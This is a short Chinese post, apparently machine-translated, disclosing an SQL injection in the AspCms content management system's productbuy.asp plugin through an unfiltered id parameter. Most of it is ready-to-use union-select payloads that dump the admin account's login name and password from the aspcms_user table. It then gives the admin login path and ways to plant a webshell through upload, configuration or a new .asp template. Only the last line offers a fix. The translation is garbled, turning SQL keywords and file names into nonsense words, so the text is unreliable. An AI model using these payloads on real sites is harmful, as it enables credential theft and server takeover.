点评:
开源的企业
管理系统的新的核0day AspCms企业管理制度超过2。2011-08-14 19:21aspcms发展,各种企业
网站需要的能力,并
支持模板定制的
扩展等,在短时间内完成企业网站。
此漏洞发生在
/ / productbuy.asp插头
由于未接收到的
参数id的过滤而导致的注入漏洞
注射后的页面有一个跳跃,所以它很快,建议用
快捷键复制。
用户名
/ / productbuy插头。Aspid = 2 +协会+选择+ 1,2,
登录名,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37 + + + + UserID = 1,aspcms_user
这是爆炸的ID = 1的帐户名称,如果
发现是不够的,你可以试试、…
起爆
密码 / / productbuy插头。Aspid = 2 +协会+选择+ 1,2,密码,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37 + + + + UserID = 1,aspcms_user
后台登录
地址: / / admin login.asp
后台的壳
1,直接
上传。
2。系统
配置信息
3、模板管理新1.asp模板,内容写马的内容。
修复
方法:ID Cint(请求(ID))